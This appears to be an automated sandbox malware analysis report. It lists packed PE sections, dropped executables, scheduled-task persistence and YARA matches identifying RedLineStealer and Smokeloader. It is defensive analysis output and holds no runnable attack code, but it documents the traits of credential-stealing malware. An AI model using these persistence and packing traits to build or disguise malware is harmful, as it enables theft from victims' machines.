i_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_7e0d4c10-0
Source: 8NjcvPNvUr.exe Static PE information: section name:
Source: 8NjcvPNvUr.exe Static PE information: section name: .idata
Source: 8NjcvPNvUr.exe Static PE information: section name:
Source: explorti.exe.0.dr Static PE information: section name:
Source: explorti.exe.0.dr Static PE information: section name: .idata
Source: explorti.exe.0.dr Static PE information: section name:
Source: random[1].exe.8.dr Static PE information: section name:
Source: random[1].exe.8.dr Static PE information: section name: .idata
Source: random[1].exe.8.dr Static PE information: section name:
Source: RoamingHJDBKJKFIE.exe.8.dr Static PE information: section name:
Source: RoamingHJDBKJKFIE.exe.8.dr Static PE information: section name: .idata
Source: RoamingHJDBKJKFIE.exe.8.dr Static PE information: section name:
Source: userKFHCAEGCBF.exe.8.dr Static PE information: section name:
Source: userKFHCAEGCBF.exe.8.dr Static PE information: section name: .idata
Source: userKFHCAEGCBF.exe.8.dr Static PE information: section name:
Source: random[1].exe0.8.dr Static PE information: section name:
Source: random[1].exe0.8.dr Static PE information: section name: .idata
Source: random[1].exe0.8.dr Static PE information: section name:
Source: axplong.exe.18.dr Static PE information: section name:
Source: axplong.exe.18.dr Static PE information: section name: .idata
Source: axplong.exe.18.dr Static PE information: section name:
Source: random[1].exe0.7.dr Static PE information: section name:
Source: random[1].exe0.7.dr Static PE information: section name:
Source: random[1].exe0.7.dr Static PE information: section name:
Source: random[1].exe0.7.dr Static PE information: section name:
Source: random[1].exe0.7.dr Static PE information: section name:
Source: random[1].exe0.7.dr Static PE information: section name:
Source: 1c593ec106.exe.7.dr Static PE information: section name:
Source: 1c593ec106.exe.7.dr Static PE information: section name:
Source: 1c593ec106.exe.7.dr Static PE information: section name:
Source: 1c593ec106.exe.7.dr Static PE information: section name:
Source: 1c593ec106.exe.7.dr Static PE information: section name:
Source: 1c593ec106.exe.7.dr Static PE information: section name:
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C22B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 8_2_6C22B700
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C22B8C0 rand_s,NtQueryVirtualMemory, 8_2_6C22B8C0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C22B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 8_2_6C22B910
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C1CF280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 8_2_6C1CF280
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe File created: C:\Windows\Tasks\explorti.job Jump to behavior
Source: C:\Users\userKFHCAEGCBF.exe File created: C:\Windows\Tasks\axplong.job
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 7_2_00353068 7_2_00353068
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 7_2_00314CF0 7_2_00314CF0
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 7_2_00347D83 7_2_00347D83
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 7_2_0035765B 7_2_0035765B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 7_2_00314AF0 7_2_00314AF0
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 7_2_00358720 7_2_00358720
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 7_2_00356F09 7_2_00356F09
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 7_2_0035777B 7_2_0035777B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 7_2_00352BD0 7_2_00352BD0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C1C35A0 8_2_6C1C35A0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C23542B 8_2_6C23542B
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C23AC00 8_2_6C23AC00
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C205C10 8_2_6C205C10
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C212C10 8_2_6C212C10
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C1D5440 8_2_6C1D5440
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C23545C 8_2_6C23545C
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C2234A0 8_2_6C2234A0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C22C4A0 8_2_6C22C4A0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C1D6C80 8_2_6C1D6C80
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C1ED4D0 8_2_6C1ED4D0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C206CF0 8_2_6C206CF0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C1D64C0 8_2_6C1D64C0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C1CD4E0 8_2_6C1CD4E0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C1F0512 8_2_6C1F0512
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C1EED10 8_2_6C1EED10
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C1DFD00 8_2_6C1DFD00
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C2285F0 8_2_6C2285F0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C200DD0 8_2_6C200DD0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C229E30 8_2_6C229E30
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C215600 8_2_6C215600
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C207E10 8_2_6C207E10
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C236E63 8_2_6C236E63
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C1E9E50 8_2_6C1E9E50
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C1E4640 8_2_6C1E4640
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C1CC670 8_2_6C1CC670
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C212E4E 8_2_6C212E4E
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C203E50 8_2_6C203E50
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C224EA0 8_2_6C224EA0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C1E5E90 8_2_6C1E5E90
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C22E680 8_2_6C22E680
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C2376E3 8_2_6C2376E3
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C1CBEF0 8_2_6C1CBEF0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C1DFEF0 8_2_6C1DFEF0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C1D9F00 8_2_6C1D9F00
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C207710 8_2_6C207710
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C2177A0 8_2_6C2177A0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C1F6FF0 8_2_6C1F6FF0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C1CDFE0 8_2_6C1CDFE0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C20B820 8_2_6C20B820
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C214820 8_2_6C214820
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C1D7810 8_2_6C1D7810
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C1E8850 8_2_6C1E8850
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C1ED850 8_2_6C1ED850
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C20F070 8_2_6C20F070
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C1F60A0 8_2_6C1F60A0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C2058E0 8_2_6C2058E0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C2350C7 8_2_6C2350C7
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C1EC0E0 8_2_6C1EC0E0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C21B970 8_2_6C21B970
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C23B170 8_2_6C23B170
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C1EA940 8_2_6C1EA940
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C1DD960 8_2_6C1DD960
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C1FD9B0 8_2_6C1FD9B0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C205190 8_2_6C205190
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C222990 8_2_6C222990
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C1CC9A0 8_2_6C1CC9A0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C209A60 8_2_6C209A60
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C232AB0 8_2_6C232AB0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C1DCAB0 8_2_6C1DCAB0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C23BA90 8_2_6C23BA90
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C1C22A0 8_2_6C1C22A0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C1F4AA0 8_2_6C1F4AA0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C20E2F0 8_2_6C20E2F0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C208AC0 8_2_6C208AC0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C1E1AF0 8_2_6C1E1AF0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C20D320 8_2_6C20D320
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C1C5340 8_2_6C1C5340
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C1DC370 8_2_6C1DC370
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C1CF380 8_2_6C1CF380
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C2353C8 8_2_6C2353C8
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C34AC30 8_2_6C34AC30
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C336C00 8_2_6C336C00
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C27AC60 8_2_6C27AC60
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C26ECC0 8_2_6C26ECC0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C2CECD0 8_2_6C2CECD0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C3F8D20 8_2_6C3F8D20
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C33ED70 8_2_6C33ED70
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C39AD50 8_2_6C39AD50
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C274DB0 8_2_6C274DB0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C306D90 8_2_6C306D90
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C3FCDC0 8_2_6C3FCDC0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C350E20 8_2_6C350E20
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C30EE70 8_2_6C30EE70
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C2F6E90 8_2_6C2F6E90
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C27AEC0 8_2_6C27AEC0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C310EC0 8_2_6C310EC0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C3B0F20 8_2_6C3B0F20
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C276F10 8_2_6C276F10
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C332F70 8_2_6C332F70
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C2DEF40 8_2_6C2DEF40
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C3B8FB0 8_2_6C3B8FB0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C27EFB0 8_2_6C27EFB0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C34EFF0 8_2_6C34EFF0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C270FE0 8_2_6C270FE0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C2C0820 8_2_6C2C0820
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C2FA820 8_2_6C2FA820
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C344840 8_2_6C344840
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C3768E0 8_2_6C3768E0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C2C6900 8_2_6C2C6900
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C2A8960 8_2_6C2A8960
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C3309B0 8_2_6C3309B0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C3009A0 8_2_6C3009A0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C32A9A0 8_2_6C32A9A0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C38C9E0 8_2_6C38C9E0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C2A49F0 8_2_6C2A49F0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C328A30 8_2_6C328A30
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C31EA00 8_2_6C31EA00
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C2ECA70 8_2_6C2ECA70
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C2EEA80 8_2_6C2EEA80
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C310BA0 8_2_6C310BA0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C376BE0 8_2_6C376BE0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C2D4420 8_2_6C2D4420
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C2FA430 8_2_6C2FA430
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C288460 8_2_6C288460
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C39A480 8_2_6C39A480
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C30A4D0 8_2_6C30A4D0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C2B64D0 8_2_6C2B64D0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C310570 8_2_6C310570
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C2D2560 8_2_6C2D2560
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C3B8550 8_2_6C3B8550
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C2C8540 8_2_6C2C8540
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C374540 8_2_6C374540
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C2645B0 8_2_6C2645B0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C33A5E0 8_2_6C33A5E0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C2FE5F0 8_2_6C2FE5F0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C2CC650 8_2_6C2CC650
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C2CE6E0 8_2_6C2CE6E0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C30E6E0 8_2_6C30E6E0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C2946D0 8_2_6C2946D0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C2F0700 8_2_6C2F0700
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C29A7D0 8_2_6C29A7D0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C338010 8_2_6C338010
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C33C000 8_2_6C33C000
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C2BE070 8_2_6C2BE070
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C34C0B0 8_2_6C34C0B0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C2800B0 8_2_6C2800B0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C268090 8_2_6C268090
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C354130 8_2_6C354130
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: String function: 6C3FDAE0 appears 44 times
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: String function: 00404610 appears 316 times
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: String function: 6C3FD930 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: String function: 6C3F09D0 appears 184 times
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: String function: 6C299B10 appears 39 times
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: String function: 6C1FCBE8 appears 134 times
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: String function: 6C2094D0 appears 90 times
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: String function: 6C293620 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8052 -s 2432
Source: 8NjcvPNvUr.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 0000000A.00000002.2721807225.00000000025D0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000008.00000002.2743508597.0000000003FB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000001E.00000002.2781993331.00000000026C0000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000001E.00000002.2783023147.00000000040C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000008.00000002.2741099564.00000000024AD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000A.00000002.2722138020.00000000040D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: random[1].exe.7.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 8ec8c5c339.exe.7.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 8NjcvPNvUr.exe Static PE information: Section: ZLIB complexity 0.9999252903005464
Source: 8NjcvPNvUr.exe Static PE information: Section: lybfcffv ZLIB complexity 0.9945889767085281
Source: explorti.exe.0.dr Static PE information: Section: ZLIB complexity 0.9999252903005464
Source: explorti.exe.0.dr Static PE information: Section: lybfcffv ZLIB complexity 0.9945889767085281
Source: random[1].exe0.7.dr Static PE information: Section: ZLIB complexity 1.00023193359375
Source: random[1].exe0.7.dr Static PE information: Section: ZLIB complexity 0.9943827479338843
Source: random[1].exe0.7.dr Static PE information: Section: ZLIB complexity 0.9993479330708661
Source: 1c593ec106.exe.7.dr Static PE information: Section: ZLIB complexity 1.00023193359375
Source: 1c593ec106.exe.7.dr Static PE information: Section: ZLIB complexity 0.9943827479338843
Source: 1c593ec106.exe.7.dr Static PE information: Section: ZLIB complexity 0.9993479330708661
Source: random[1].exe.8.dr Static PE information: Section: ZLIB complexity 0.9999252903005464
Source: random[1].exe.8.dr Static PE information: Section: lybfcffv ZLIB complexity 0.9945889767085281
Source: RoamingHJDBKJKFIE.exe.8.dr Static PE information: Section: ZLIB complexity 0.9999252903005464
Source: RoamingHJDBKJKFIE.exe.8.dr Static PE information: Section: lybfcffv ZLIB complexity 0.9945889767085281
Source: userKFHCAEGCBF.exe.8.dr Static PE information: Section: ZLIB complexity 0.9974614696866485
Source: userKFHCAEGCBF.exe.8.dr Static PE information: Section: finyobjn ZLIB complexity 0.9947765539095907
Source: random[1].exe0.8.dr Static PE information: Section: ZLIB complexity 0.9974614696866485
Source: random[1].exe0.8.dr Static PE information: Section: finyobjn ZLIB complexity 0.9947765539095907
Source: axplong.exe.18.dr Static PE information: Section: ZLIB complexity 0.9974614696866485
Source: axplong.exe.18.dr Static PE information: Section: finyobjn ZLIB complexity 0.9947765539095907
